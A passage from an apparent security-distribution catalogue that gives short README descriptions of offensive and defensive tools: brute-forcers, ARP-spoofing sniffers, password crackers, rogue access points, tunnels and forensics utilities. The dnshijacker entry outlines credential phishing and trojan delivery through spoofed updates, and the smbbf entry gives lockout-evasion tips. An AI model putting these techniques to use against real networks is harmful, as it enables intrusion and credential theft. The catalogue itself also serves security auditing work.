to identify and recover evidence from images acquired during incident
response or from live systems.  The Sleuth Kit is open source,
which allows investigators to verify the actions of the tool or
customize it to specific needs.

The Sleuth Kit uses code from the file system analysis tools of
The Coroner's Toolkit (TCT) by Wietse Venema and Dan Farmer.  The
TCT code was modified for platform independence.  In addition,
support was added for the NTFS (see docs/ntfs.README) and FAT (see
docs/fat.README) file systems.  Refer to the CHANGES.FROM.TCT file
for specific differences.  Previously, The Sleuth Kit was called
The @stake Sleuth Kit (TASK).  The Sleuth Kit is now independant
of any commercial or academic organizations.  

It is highly recommended that these command line tools can be used
with the 1.70 version of the Autopsy Forensic Browser.  Autopsy,
(http://www.sleuthkit.org/autopsy), is a graphical interface to
the tools of The Sleuth Kit and automates many of the procedures
and provides features such as image searching and MD5 image integrity
checks.

        

Package Directory: /opt/Operator_Extras/Tools/login_hacker-11


login_hacker is a tool used to try to brute force guess login/passwords against 
modem carriers. This program is flexible and protable by using the scripting
language used minicom.


WHAT DO YOU NEED
----------------
An installed UNIX operating system.
Minicom installed (comes with any Linux distribution).
This package.
A modem connected to your system and /dev/modem pointing to the right
seriell port.
A phone number with remote modem to answer and presenting a login/password
prompt ;-)

NEW: with v1.1 I added my check_ppp script which connects to the number and
then starts pppd to check for ppp dial-ins which might be passwordless.


        

Package Directory: /opt/Operator_Extras/Tools/anger-133


Anger is a PPTP sniffer and attack tool. It sniffs PPTP's MSCHAP
challenge/response and outputs it in a format suitable for input
into the L0phtcrack password cracking program.

        

Package Directory: /opt/Operator_Extras/Tools/domtools


This package allows you to traverse DNS domain hierarchies,
list all hosts (or subdomains) within a given domain, convert host name to
IP address and vice-versa, convert a normal IP address to the "in-addr.arpa."
format and vice-versa, and more.   These commands can be used manually, or
included as building blocks for higher level DNS tools.  They generate output
that is easily computer parsable.

        

Package Directory: /opt/Operator_Extras/Tools/rda-021c


rda is a command line Linux tool to remotely acquire data (like disk cloning 
or disk/partition imaging) and verify the transfer using md5 and/or crc32 
checksums. The program is both the server and the client.

In short, the features are:

 - Transfers data via an ethernet or other network interface
 - MD5 and/or CRC32 checksums
 - Option to skip read errors - like bad blocks, dirty CD's, etc.
	Bad blocks are replased with zero's and their positions are logged.
	Can do that for big disks also ( exceeds 8000000 TB on 32-bit machines)
 - Option to span output to multiple files
 - Can write output to a disk or partition 
	for disk duplication, etc.


        

Package Directory: /opt/Operator_Extras/Tools/mdcrack-12


MDcrack is designed as a proof of concept to show how weak
are MD* hashed passwords widely used in many authentication schemes.

        

Package Directory: /opt/Operator_Extras/Tools/RandomNet


RandomNet is a tool that builds random, realistic honeyd configuration files.  
It is designed for users who want to develop a realistic network using the 
honeyd tool, but do not want to spend time building a complex configuration 
file by hand.  It runs off the command line using a specific configuration 
file for fast, repeated use.  It also provides a GUI for developing the 
RandomNet configuration file.

RandomNet was written in Java to be compatible on many different operating 
systems.  For installation instructions and documentation, please see the 
provided pdf file.

        

Package Directory: /opt/Operator_Extras/Tools/honeyd-scripts


honeynet.br
   cmdexe.pl

   cmdexe.pl is a Honeyd  module that emulates a DOS command prompt. It is 
   useful to emulate a simple Windows "shell" backdoor, as used by many 
   worms nowadays.

   honeydsum.pl

   honeydsum.pl is a tool written in Perl designed to generate a text summary 
   from Honeyd logs. The summaries may be produced using different parameters 
   as filters, such as ports, protocols, IP addresses or networks. It shows 
   the top source and port access and the number of connections per hour, and 
   supports input from multiple log files. The script can also correlate 
   events from several honeypots. 

   kuang2.pl

   kuang2.pl is a Honeyd module that emulates the backdoor installed by the 
   Kuang2 virus. It saves uploaded files and also logs attempts to use Kuang2 
   backdoor commands, like file download, execution, deletion, etc. 

   mydoom.pl

   mydoom.pl is a simple Perl script, that works with Honeyd, to emulate the 
   backdoor installed by the Mydoom virus. It saves uploaded files and also 
   logs attempts to use the Mydoom backdoor proxy capability (socks4). 


Daniel Cid
   telnet-emul 	

   Telnet Simulation for Linux, Solaris and Windows

Eric Thomas
   Honeyd Regression Testing
   
   Scripts to check Honeyd personalities


        

Package Directory: /opt/Operator_Extras/Tools/netwox_524


Netwox is a utility that can be thought of as a one stop shop network toolbox. 
It includes a graphical front-end called Netwag. This kit comes with 150 tools 
that can be used to perform a multitude of tasks that are very useful to any 
administrator. It supports various protocols (DNS, FTP, HTTP, NNTP, SMTP, 
SNMP) and performs low level functions like sniffing, spoofing traffic, and 
playing client/server roles. Both Windows and Unix versions are included.
        

Package Directory: /opt/Operator_Extras/Tools/tds-002


NOTE: TDS was formerly called SCANDNS.

TDS is a script written in perl for unix which utilizes data from dns
information, essentially scanning the entire internet by querying the
root-servers, and then the individual nameservers for domains.

        

Package Directory: /opt/Operator_Extras/Tools/brian


  brian - "He's not the Messiah, he's a very naughty man!"
 
  Based on the ideas of ARP poisoning present in Ettercap, this program
  is a simple tool to effectively convert a switched network (or a part of
  it) into a shared network so that sniffing can take place.

        

Package Directory: /opt/Operator_Extras/Tools/sara-54


SARA (Security Auditor's Research Assistant), a derivitive of the 
Security Administrator Tool for Analyzing Networks (SATAN), remotely probes
systems  via  the  network  and  stores its findings in a database. The
results can be viewed with any Level 2 HTML browser that  supports  the
http protocol (e.g.  Mosaic, Netscape (see NOTE below), etc.)

        

Package Directory: /opt/Operator_Extras/Tools/lsrtunnel-021


lsrtunnel spoofs connections using source routed packets. 
        

Package Directory: /opt/Operator_Extras/Tools/httptunnel-305


httptunnel creates a bidirectional virtual data path tunnelled in HTTP
requests.  The requests can be sent via an HTTP proxy if so desired.

This can be useful for users behind restrictive firewalls.  If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.

        

Package Directory: /opt/Operator_Extras/Tools/smbbf


The SMB Auditing Tool by patrik.karlsson@ixsecurity.com
--------------------------------------------------------

This a suite of SMB and Netbios programs.
The programs are:

smbdumpusers     - Used to retrieve users from a Windows NT/2000 box.
		   If verbose is used in combination with the Sid to User
		   mode, the RIDS of all users will be displayed aswell.

smbgetserverinfo - Returns some information from the ipaddress supplied.

smbbf 		 - A SMB bruteforcer which tries approx. 1200 logins/sec
		   on Windows 2000 because of the timeout bug. On NT4 it's
		   very much slower making a couple logins a sec.

		   If you run smbbf with only the ip specified, it will
		   attemt to retrieve all users, and try to login with a
		   blank password, followed by the username, in lowercase
		   as password and finally with the password "password".

		   If smbbf successfully logs in to an account, it will
		   continue with the next account.

		   If you feel that you want to take some precautions to
		   not disable every account on the server, try the -g flag.
		   After it locks out the first account, it stops at tries-1,
		   on the next account, and will not process the rest of the
		   password file. This is done on every account following the
		   locked out one. 

		   Bare in mind that if eg. the lockout is set to 3 tries, 
		   some user has done 2 "bad logins", it will seem to smbbf 
		   that the lockout is set to 1. Therefore its recommended
		   to keep the password list smaller than the lockout number,
		   and not to use the -g flag if not absolutely nessesary.

		   The administrator account doesn't seem to return the error
		   "account locked out", so the next available account will
		   be the one that will be monitored for lockout attempts.

        

Package Directory: /opt/Operator_Extras/Tools/resettcp-12


by Paul Watson

reset-tcp
   Proof of concept to reset tcp connections by Slipping in the Window

        

Package Directory: /opt/Operator_Extras/Tools/4g8-09b


Packet Sniffer Over Switched Network

4G8 (Forge Gate) allows you to capture traffic from a third party in a 
switched environment at the expense of a slight increase in latency to 
that third party host. Utilizing ARP cache poisoning, packet capture 
and packet reconstruction techniques, 4G8 works with nearly all TCP, ICMP 
and UDP IPv4 traffic flows.

        

Package Directory: /opt/Operator_Extras/Tools/ipaudit-095


IPAUDIT listens to a network device in promiscuis mode, and records
of every 'connection', each conversation between two ip addresses.  A unique
connection is determined by the ip addresses of the two machines, the 
protocol used between them and the port numbers (if they are communicating
via udp or tcp).

IPAUDIT can be used to monitor network activity for a variety of purposes.
It has proved useful for monitoring intrusion detection, bandwidth 
consumption and denial of service attacks.

        

Package Directory: /opt/Operator_Extras/Tools/dnshijacker-11



Aside from the tremendous comical value of redirecting your friends to gay porno
sites there are a few other (possibly legitimate) uses to dnshijacker. Firstly,
sites can be filtered based on keywords in domain names. Of course this can
easily be bypassed through the usage of a proxy. The second, and in my opinion,
more useful use is to hijack the queries for all the popular ad servers (such as
doubleclick.net). That way not only are you alleviating yourself from the
ghastly sight of advertisements, but you've also upped your level of privacy a
notch or two.

Along with the prankster, the blackhat will probably find the most uses for
dnshijacker. the possibilities are endless. One could easily mirror a site
(hotmail, etrade, online banking, etc) and redirect requests to that mirror for
login/password collection. Another target for attack is the auto-update features
that most windows applications use. Next time Winamp or AOL Instant Messenger
check for an update, the request can be redirected to yourself, an "update
available" answer can then be spoofed, and a trojan wrapped executable sent to
the victim.

        

Package Directory: /opt/Operator_Extras/Tools/burpspider_v11


Burp spider is a tool for enumerating web-enabled applications. It uses 
various intelligent techniques to generate a comprehensive inventory of 
an application's content and functionality.

Burp spider enables the user to obtain a detailed understanding of how a web 
application works, avoiding the time-consuming and unreliable task of manually 
following links, submitting forms and scouring HTML source code. Potentially 
vulnerable application functions can be quickly identified, allowing the user 
to check for specific vulnerabilities such as SQL injection and directory 
traversal.
        

Package Directory: /opt/Operator_Extras/Tools/ADMsmb_02


ADM smb is a security scanner for Samba 
/* based on the src of the smbclient  from the samba team */
ADMsmb will perform a complete audit of samba for you on a host you
provide.

1: Get the netbios name of the machine
2: Give you information about this machine 
  {
    share list;
    workgroup;
    domain;
    os;
   }

3: try to access any shares exported 
4: perform a session brute force  
5: perform brute force on a directory specified.

        

Package Directory: /opt/Operator_Extras/Tools/dcom_scanner


dcom-isvuln
	dcom/rpc scanner by: kid and farp

dcom_scanner v1.02
	dcom/rpc scanner by: kid and farp
	Modified by: swoop@ussysadmin.com to scan a host range
        

Package Directory: /opt/Operator_Extras/Tools/ike-scan-17


ike-scan discovers IKE hosts and can also fingerprint them using the
retransmission backoff pattern.

ike-scan does two things:

a) Discovery: Determine which hosts are running IKE.
   This is done by displaying those hosts which respond to the IKE requests
   sent by ike-scan.

b) Fingerprinting: Determine which IKE implementation the hosts are using.
   This is done by recording the times of the IKE response packets from the
   target hosts and comparing the observed retransmission backoff pattern
   against known patterns.

The retransmission backoff fingerprinting concept is discussed in more
detail in the UDP backoff fingerprinting paper which should be included
in the ike-scan kit as udp-backoff-fingerprinting-paper.txt.

The program sends IKE main mode requests to the specified hosts and displays
any responses that are received.  It handles retry and retransmission with
backoff to cope with packet loss.  It also limits the amount of bandwidth
used by the outbound IKE packets.

IKE is the Internet Key Exchange protocol which is the key exchange and
authentication mechanism used by IPsec.  Just about all modern VPN systems
implement IPsec, and the vast majority of IPsec VPNs use IKE for key exchange.
Main mode is one of the modes defined for phase-1 of the IKE exchange (the
other defined mode is aggressive mode).  RFC 2409 section 5 specifies that
main mode must be implemented, therefore all IKE implementations can
be expected to support main mode.

        

Package Directory: /opt/Operator_Extras/Tools/seringe


seringe v0.2: arp injector and redirector
Copyright 2003,2004 - Michael Hendrickx (michael@scanit.be)
 
intercepts arp requests, sends "own" mac address (or -m arg). 
Without libnet, libpcap or any other libraries.. made during
a security audit when i had no access to these libraries.
   
todo: accept ip addr arguments with -m and -f 

        

Package Directory: /opt/Operator_Extras/Tools/passifist


Passifist is a tool for passive network discovery. It could be used for a 
number of different things, but was mainly written to discover hosts 
without actively probing a network. The tool analyzes broadcast traffic 
and has a plugin architecture through which it dissects and reports 
services found. Initial version holds support for the following protocols 
and plugins: CDP, CIM, HSRP, IPX, NETOP, SMB, TFTP.
        

Package Directory: /opt/Operator_Extras/Tools/air-125


Automated Image and Restore

AIR is a graphical front-end for dd and dcfldd designed to make the task
of creating forensic images of magnetic media easier for investigators and
incident response personnel.  AIR is written in Perl/Tk and (at this time)
only supports Linux.  Features include:

- choice of using either dd or dcfldd
- image verification between source and copy via MD5 or SHA1
- image compression/decompression via gzip/bzip2
- image over a TCP/IP network
- maintains a detailed session log
- supports SCSI tape drives
- wiping (zeroing) drives or partitions
- splitting images into user-defined segments

        

Package Directory: /opt/Operator_Extras/Tools/rainbowcrack-12


In short, the RainbowCrack tool is a hash cracker. While a traditional brute 
force cracker try all possible plaintexts one by one in cracking time, 
RainbowCrack works in another way. It precompute all possible plaintext - 
ciphertext pairs in advance and store them in the file so called 
"rainbow table". It may take a long time to precompute the tables, but once 
the one time precomputation is finished, you will always be able to  crack 
the ciphertext covered by the rainbow tables in seconds.

Patched:
This patch contains the following additional hash algorithms: CiscoPIX, MySQL 
v.3.23, MySQL SHA1, NTLM, MD2, MD4 and RIPEMD160.
        

Package Directory: /opt/Operator_Extras/Tools/isic-006


ISIC (and components) is intended to test the integrity of an IP Stack
and its component stacks (TCP, UDP, ICMP et. al.)  It does this by generating
a controlled random packet (controlled randomness...  wacky huh?).  The user can
specify he/she/it [I'm tempted to put 'it' before 'she' :-)] wants a stream of
TCP packets.  He/she/it suspects that the target has weak handling of IP Options
(aka Firewall-1).  So he/she/it does a 'tcpsic -s rand -d firewall -I100'.  And
observes the result.

        

Package Directory: /opt/Operator_Extras/Tools/airsnarf-02


Airsnarf - A rogue AP setup utility
0.2
The Shmoo Group
http://www.shmoo.com

Airsnarf is a simple rogue wireless access point setup utility designed to 
demonstrate how a rogue AP can steal usernames and passwords from public 
wireless hotspots.  Airsnarf was developed and released to demonstrate an 
inherent vulnerability of public 802.11b hotspots--snarfing usernames and 
passwords by confusing users with DNS and HTTP redirects from a competing AP.

        

Package Directory: /opt/Operator_Extras/Tools/httpscan


This program will try to grab the httpd head on the specified 
port at the target host, and strip the information to what's 
behind the "Server:". 

        

Package Directory: /opt/Operator_Extras/Tools/madwifi


This software contains a Linux kernel driver for Atheros-based
Wireless LAN devices.  The driver supports station, AP, adhoc, and
monitor modes of operation.  The Atheros driver depends on a
device-independent implementation of the 802.11 protocols that
originated in the BSD community (NetBSD in particular).  You will
find a small amount of BSD-ish glue code that exists mainly to
minimize diffs with the BSD variants However as much as possible
this is "native Linux code" that tries to conform to Linux style
and operation.

The driver functions as a normal network device and uses the Wireless
Extensions API.  As such normal Linux tools can and should be used
with it.  Where the wireless extensions are lacking private ioctls
have been added.

        

Package Directory: /opt/Operator_Extras/Tools/tforce-100


tForce is  a  HTTP  realm  brute forcing utility which  utilizes  wordlists for 
passwords  against  the  Basic  Authentication  Scheme  described  in  RFC 2068 
(section 11.1). There's no limit to the number of try's you can attempt against 
an HTTP server, so  in fact, if you have  good wordlists, it's only a matter of 
time unless the victim has chosen a very secure password.

        

Package Directory: /opt/Operator_Extras/Tools/vlan_18


802.1Q VLAN implementation for Linux

        

Package Directory: /opt/Operator_Extras/Tools/scanssh-14


Scanssh scans the given addresses and networks for running SSH
servers.  It will query their version number and displays the results
in a list.

This program was originally written under OpenBSD as a personal
measurement tool.  However, besides gathering statistics, it's also
useful for other purposes such as ensuring that all machines on your
network run the latest SSH versions, etc...

        

Package Directory: /opt/Operator_Extras/Tools/smbMITM


This program allow you to recover SMB passwords in clear from the network 
when they should be encrypted.
It's a derivated MIM attack described in phrack 60 ( article "SMB/CIFS 
by the root").

        

Package Directory: /opt/Operator_Extras/Tools/WepAttack-013


WepAttack is a Wireless LAN Tool for Linux which guesses WEP Keys based on
a active dictionary attack. Millions of words can be checked out.

        

Package Directory: /opt/Operator_Extras/Tools/phoenix2


phoenix is a tool that 'shoots' every connection you specify by
sending (spoofed) SYN FIN and RST packets ;>

phoenix2 does the same but spoofs in addition the ethernet header
(the MAC address)

http://teso.scene.at/

        

Package Directory: /opt/Operator_Extras/Tools/irpas-010


The IRPAS program collection can be used to perform routing protocol attacks. 
Often, the approach is to redirect a traffic stream through another router 
which is under the control of an attacker.
Existing systems can be used to do this since most operating systems provide 
routing capabilities. But what, if such a system is not available? Or the 
attacker got a system to reroute it's traffic through another one just to 
discover that the new router immediately send back an ICMP redirect to correct 
the routing?


Content:	* dhcpx
			Dynamic Host Confusion Program 
			Requests all available IP adresses from a DHCP server
			(still first implementation - might me a bit alpha)
		* icmp_redirect
			Dynamic redirection: redirects communication using
			network/netmask matches for targeted attacks
		* dfkaa
			"Devices formerly known as Ascend" hacking tool 
			(still a little undocumented - give it a try)
		* file2cable
			raw ether frame sender
		* itrace 
			traceroute using echo-request
		* tctrace
			traceroute using TCP SYN packets
		* netenum
			target enumeration
		* netmask
			ICMP netmask query
		* protos 
			IP protocol scanner
		* cdp 
			program for sending Cisco Discovery Protocol messages
		* igrp
			program for sending IGRP routing updates
		* irdp	
			program for sending IRDP ICMP messages
		* irdpresponder
			sends responses to IRDP solicication messages
		* hsrp
			Hot Standby Router Protocol takeover tool
		* ass
			autonomous system scanner 
			- IGRP
			- IRDP
			- EIGRP
			- RIPv1
			- RIPv2
			- CDP
			- HSRP
			- OSPF
        

Package Directory: /opt/Operator_Extras/Tools/whats_on


whats_on: Port query utility

Simple proggie that scans a network range for a specific port and returns  
a result if that port is open on the host.

        

Package Directory: /opt/Operator_Extras/Tools/cdpr-220


cdpr will show which switch and port a machine is connected to, and 
optionally decode a complete CDP advertisement. Version 2.0.0 of cdpr now 
supports transmiting the data decoded to a server.

Up to this current release, cdpr supports the ARM processor. cdpr has now 
been compiled and tested on Linux (x86), FreeBSD (x86), Sun Solaris (SPARC), 
HP-UX (PA-Risc), AIX 4.3.3 (RS6000), Windows NT/2000/XP (x86), and 
ARM (Sharp Zaurus SL-5500). 
Read README.Win32 for compiling instructions on the Win32 architecture.

        

Package Directory: /opt/Operator_Extras/Tools/ADMnbtscan


ADM-nbtscan
        ADM-nbtscan v0.1 by J. Barber
        Simple script that uses ADM-smb and nbtscan to produce a summary
        listing of accessible smb shares.

        

Package Directory: /opt/Operator_Extras/Tools/aphunter


Access Point Hunter. It can find and automatically connect to whatever 
wireless network is within range. It can be used for site surveys, writing 
the results in a file.
        

Package Directory: /opt/Operator_Extras/Tools/sambascan2-034


Sambascan2 allows you to search an entire network or a number of hosts for 
SMB shares. It will also list the contents of all public shares that it 
finds. The difference between sambascan2 and other SMB viewers and scanners 
is that it will search everything using TCP/IP, and it will not send a lot of
broadcast messages, so it can be used over LAN boundaries. It only uses SMB 
to list the shares and their contents.  
        

Package Directory: /opt/Operator_Extras/Tools/wardrive-23


This tool is for mapping your city for wavelan networks with a GPS device
while you are driving a car.
It saves found links to a file with the corresponding GPS position.

There are other scripts available as well:
	* perl scripts from Peter Shipley, which are for FreeBSD
	  http://www.dis.org/wl/
	* perl scripts from Frisco, which are for OpenBSD
	  http://blackant.net/other/wireless.php
So what was needed is an effective tool for Linux. Here it is.
Other nice ressources to visit are www.wardriving.com and
 www.personaltelco.net/index.cgi/WarDriving

        

Package Directory: /opt/Operator_Extras/Tools/ophcrack-20


OPHCRACK 2.0 (Time-Memory-Trade-Off-Crack)

A windows password cracker based on the faster time-memory trade-off using
rainbow tables.

This is an evolution of the original ophcrack 1.0 developed at EPFL
(http://lasecwww.epfl.ch/~oechslin/projects/ophcrack)

Ophrack 2.0 comes with a GTK Graphical User Interface which runs on Windows
as well as on Linux.

The tables used by ophcrack are not compatible with the ones generated
by another tool called rainbowcrack. The tables of ophcrack are much
more compact and since memory can be traded for time, allow for much
faster cracking of passwords.

Download the ophcrack rainbow tables from:
http://lasecwww.epfl.ch/SSTIC04-10k.zip
or http://lasecwww.epfl.ch/SSTIC04-5k.zip

        

Package Directory: /opt/Operator_Extras/Tools/smbtool-10



smbtool consists of two programs, nbview and nbreg

NetBios Viewer (nbview) is program to check netbios information of 
workstations in your network.

Features
- Resolve a netbiosname to a ip address
- Resolve a ip address to a netbiosname
- The logged in user of the workstation
- See what kind of workstation/server the netbios name is.
- See if the netbiosname is a unique name


NetBios Registrar (nbreg) is a small program so you can register and release 
NetBios names. This program can be usefull to give linux/bsd machines a 
NetBios name.

You need to have a WINS server on your network to make this work!

        

Package Directory: /opt/Operator_Extras/Tools/cdpsniffer


CDPsniffer is a smaill perl only Cisco discovery protocol (CDP) decoding 
sniffer. It sniffs the networktraffic, picks out the cdp packets and prints 
out the decoded protocol contents.

http://www.remote-exploit.org/codes.html
        

Package Directory: /opt/Operator_Extras/Tools/areset


  ARESETTER is a simple program to reset network connections.
  It works by sniffing the network traffic for three-way-handshakes
  and by constructing TCP packets with the RST flag and the right
  sequence number.

        

Package Directory: /opt/Operator_Extras/Tools/icmptunnel-013


icmptunnel encapsulates data in ICMP frames. The usual mode of operation is 
tcp/ip forwarding, one icmptunnel will be set up on a blocked machine (behind 
a firewall) listening on TCP/IP port X. The other icmptunnel will be set up 
on a nonblocked machine (somewhere on the internet) connected to a local 
service (such as port 23, telnet). Data received on the blocked machine's 
tcp/ip socket will be encapsulated in an ICMP packet of users choice 
(ICMP_ECHO, ICMP_ECHOREPLY, ICMP_TIMESTAMP, etc..) and sent to the nonblocked 
machine. This machine will identify the packet as encapsulated data, 
decapsulate the data and forward it on to its tcp/ip socket connected to the 
telnet daemon. The telnet daemon responds with some data, icmptunnel on the 
nonblocked machine encapses the packet and sends it back to the blocked 
machine (ICMP type still user definable). 

        

Package Directory: /opt/Operator_Extras/Tools/arp0c2


ARP0c is a connection interceptor (using ARP spoofing and a bridging engine).
ARP requests from various sources in a switched environment get false ARP 
response packets which point to the host running ARP0c. Packets from these 
hosts are bridged with an internal engine to the real destination address to 
allow normal network operation and keep TCP connections alive. Packets to 
hosts in remote (read: reachable using a router) subnets are forwarded to a 
gateway using an internal routing table - independant from the hosts routing 
table. 

When using ARP0c, ARP requests (which are normally send to all hosts) are 
responded by the real host and your ARP0c server. After the initial response, 
ARP0c continues to send out ARP response packets to keep the target host 
'informed'. This causes most systems to discard the right answer and belive 
ARP0c.
Now, packets to HOST1 are send to the Ethernet address of ARP0c. It takes care 
of the layer 2 forwarding (bridging) to finally deliver the packets the the 
right recipient, because we don't want the connection to break.

        

Package Directory: /opt/Operator_Extras/Tools/asleap


This tool is released as a proof-of-concept to demonstrate a weakness in the
LEAP protocol.  LEAP is the Lightweight Extensible Authentication Protocol, 
intellectual property of Cisco Systems, Inc.  LEAP is a security mechanism
available only on Cisco access points to perform authentication of end-users
and access points.  LEAP is written as a standard EAP-type, but is not compliant
with the 802.1X specification since the access point modifies packets in
transit, instead of simply passing them to a authentication server (e.g. 
RADIUS).

        

Package Directory: /opt/Operator_Extras/Tools/nmbscan-124


nmbscan scans the shares of a SMB/NetBIOS network, using the NMB/SMB/NetBIOS 
protocols. It is useful for acquiring information on a local area network 
for such purposes as security auditing.

It can obtain such information as NMB/SMB/NetBIOS/Windows hostname, IP 
address, IP hostname, ethernet MAC address, Windows username, 
NMB/SMB/NetBIOS/Windows domain name, and master browser.

It can discover all the NMB/SMB/NetBIOS/Windows hosts on a local area network 
by using the hosts lists maintained by master browsers. 
        

Package Directory: /opt/Operator_Extras/Tools/deceit


   deceit.c by Aleph One
  
   This program implements enough of the PPTP protocol to steal the
   password hashes of users that connect to it by asking them to change
   their password via the MS-CHAP password change protocol version 1.

        

Package Directory: /opt/Operator_Extras/Tools/arpsucker


The ArpSucker is a patch to arping of iputils:
This patch will allow you to poison the arp cache of the target machine. You 
can add all the ip's you want to become in the arp cache of all the machines
and essentially all packets will be redirected to you. With ip_forward turned
on, the packets will be resent to the intended destination.

        

Package Directory: /opt/Operator_Extras/Tools/juggernaut_12


Juggernaut is a robust network tool for the Linux OS.  It contains several
modules offering a wide degree of functionality.  Juggernaut has been tested 
successfully on several different Linux machines on several different networks. 
However, your mileage may vary depending on the network topologies of the
environment (ie: Smart hubbing will kill much of the packet sniffing 
functionality...) and, to a lesser extent, the machine running Juggernaut.
If something doesn't work, use a network debugger and figure out why...  

Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on
April 2, 1997.

        

Package Directory: /opt/Operator_Extras/Tools/ttt-13r


TCP Testing Tool (ttt)
----------------------

ttt is a tool that can generate TCP segments with arbitrary values for
any field in the IP or TCP headers. A TCP payload can be added to the
segment by specifying the file with the payload in the command line (-P
option) or by passing the payload via standard input (piping the output
of another command to ttt.)

        

Package Directory: /opt/Operator_Extras/Tools/nast-020


Nast is a packet sniffer and a LAN analyzer based on Libnet and Libpcap. It 
can sniff the packets on a network interface in normal mode or in promiscuous 
mode.
As an analysis tool, it can check for other NICs on the network which are set 
in promiscuous mode, build a list of all hosts on a LAN, find a gateway, 
perform port scanning on a multiple hosts, catch daemon banners, follow the 
TCP data stream, reset a connection, and determine whether a link type is a 
hub or switch.
        

Package Directory: /opt/Operator_Extras/Tools/hotspotter-03


Hotspotter passively monitors the network for probe request frames to identify 
the preferred networks of Windows XP clients, and will compare it to a 
supplied list of common hotspot network names. If the probed network name 
matches a common hotspot name, Hotspotter will act as an access point to 
allow the client to authenticate and associate. Once associated, Hotspotter 
can be configured to run a command, possibly a script to kick off a DHCP 
daemon and other scanning against the new victim.
        

Package Directory: /opt/Operator_Extras/Tools/nsat-15


NSAT is a fast, stable bulk security scanner designed to audit remote network
services and check for versions, security problems, gather information about
the servers and the machine and much more. Unlike many other auditing tools,
it can collect information about services independently of vulnerabilities,
which makes it "timeless", meaning it doesn't depend on frequent updates as new
vulnerabilities are found.

        

Package Directory: /opt/Operator_Extras/Tools/aimsniff-09d


AIM Sniff is a utility for monitoring and archiving AOL Instant Messenger 
messages across a network.  You can either do a live dump (actively sniff the 
network) or read a PCAP file and parse the file for IM messages.  You also have
the option of dumping the information to a MySQL database or STDOUT. 

http://www.aimsniff.com
        

Package Directory: /opt/Operator_Extras/Tools/vlan-testing


VLAN security sample programs. These programs are from Steve A. Rouiller GIAC
security paper, Virtual LAN Security: weaknesses and countermeasures.
Files:
    VLAN Security.pdf  pvlan  vlan-DE-1-2  vlan-SE-1  vtp-down  vtp-up
        

Package Directory: /opt/Operator_Extras/Tools/nbtstat


This is a small utility that does the equivalent of NT's nbtstat -A . 
It sends a Node Status request to the host specified on the command line, 
and waits (up to 10 seconds) for the reply. If it gets the reply, it dumps
the reply as hex, and then interprets the name table. 
        

Package Directory: /opt/Operator_Extras/Tools/iplog-223


iplog is a TCP/IP traffic logger.  Currently, it is capable of logging 
TCP, UDP and ICMP traffic.  Adding support for other protocols
should be relatively easy.

iplog's capabilities include the ability to detect TCP port
scans, TCP null scans, FIN scans, UDP and ICMP "smurf" attacks,
bogus TCP flags (used by scanners to detect the operating system in use), 
TCP SYN scans, TCP "Xmas" scans, ICMP ping floods, UDP scans, and IP
fragment attacks.

iplog is able to run in promiscuous mode and monitor traffic to all hosts
on a network.

        

Package Directory: /opt/Operator_Extras/Tools/yersinia-056


      yersinia is a framework for performing layer 2 attacks.  The  following
      protocols  have  been implemented in Yersinia current version: Spanning
      Tree Protocol(STP), Virtual Trunking Protocol (VTP), Hot Standby Router
      Protocol  (HSRP),  Dynamic  Trunking Protocol (DTP), IEEE 802.1Q, Cisco
      Discovery Protocol (CDP) and finally, the  Dynamic  Host  Configuration
      Protocol (DHCP).

      Some  of  the  attacks implemented will cause a DoS in a network, other
      will help to perform any other more advanced attack, or both. In  addi-
      tion,  some  of  them  will be first released to the public since there
      isn't any public implementation.

        

Package Directory: /opt/Operator_Extras/Tools/captive-115


The first full read/write free access to NTFS disk drives. You can mount 
your Microsoft Windows NT, 200x or XP partition as a transparently accessible 
volume for your GNU/Linux.

To mount an NTFS filesystem:

mkdir /mnt/dosc
mount -t captive-ntfs /dev/hda1 /mnt/dosc
        

Package Directory: /opt/Operator_Extras/Tools/thc-leapcracker-01


The THC LEAP Cracker Tool suite contains tools to break the NTChallengeResponse 
encryption technique e.g. used by Cisco Wireless LEAP Authentication. Also 
tools for spoofing challenge-packets from Access Points are included, so you 
are able to perform dictionary attacks against all users.
        

Package Directory: /opt/Operator_Extras/Tools/fakeap-031


Using features of the Host AP Driver for Intersil Prism2/2.5/3 
(http://hostap.epitest.fi), Fake AP rapidly generates 802.11b beacon
frames with random ESSID, BSSID (MAC), and channel assignments.  Wardriving
tools like Kismet or NetStumbler will see thousands of APs pop up on their
screens.  While more knowledgeable individuals will spot these fake APs 
for what they are, those with less clue will be generally befuddled and 
great comedy will ensue.  Fake AP can be used on its own, as part of a
wireless honeypot, or form a component of an 802.11b security architecture.  

        

Package Directory: /opt/Operator_Extras/Tools/naptha-11


1) bogusarp - make a bogus entry in the router's arp cache so it actually
puts packets with our faked source address on the ethernet. This is done
by sending an arp query from the mac & ip we want cached ever 6.5 seconds.
This is an inelegant hack, and may be replaced in a future version with a
client that actually listens for requests for its IP address and responds
appropriately. Requires the listening ethernet interface (eth0,
ne3,...) to be specified on the command line.

2) synsend - a general purpose program that sends a syn from a host &
port to another host (or network) and port. Used to send the initial SYN
to the victim.

3) srvr - this replaces the ackfin program in naptha 1.0. On the command
line, one specifies the flags to be listened for in upper case. These are
indicated by the first letter of the flag. The flags to be set in the
response packet are the same letters, but in lower case. Flags may be
specified in any order. The functionality of the ackfin program is
obtainted by using the flags -SAaf with srvr.

        

Package Directory: /opt/Operator_Extras/Tools/ftester-09


The Firewall Tester (ftester for friends), is a tool designed for testing 
firewalls filtering policies, from version 0.6 it also includes an Intrusion 
Detection System (IDS) testing feature. Basically ftester is made of a 
packet generator tool (ftest) and a sniffer (ftestd), the first script 
injects custom packets with a signature in the data part while the sniffer 
listens for such marked packets, the comparison of the sniffer logs with 
the injector ones permits the identification of firewall filtering rules. 
Unlike common firewall testing tools or packet generators ftester is 
capable of generating network traffic that will looks like real connections 
to the firewall or IDS system tested, this feature allows us to test 
stateful inspection firewalls (like netfilter or ipfilter) and IDS (like 
snort). Another advantage of this architecture is that we can spoof crafted 
packets source address since the sniffer knows which packets are generated 
by it's counterpart, some tricks involving TTL permits the spoofing also 
when simulating real connections, this is described as the 'connection 
spoofing mode'. 

The ftester components are perl scripts so they can be executed on any 
platform with a recent version of perl (at least 5.6.1 is recommended) 
and the three perl modules Net::RawIP, Net::PcapUtils, NetPacket, they 
can be downloaded at www.cpan.org or using the CPAN shell.

 - ftest (the client-side packet generator)
 - ftestd (the sniffer)
 - ftest.conf (ftest example configuration file)
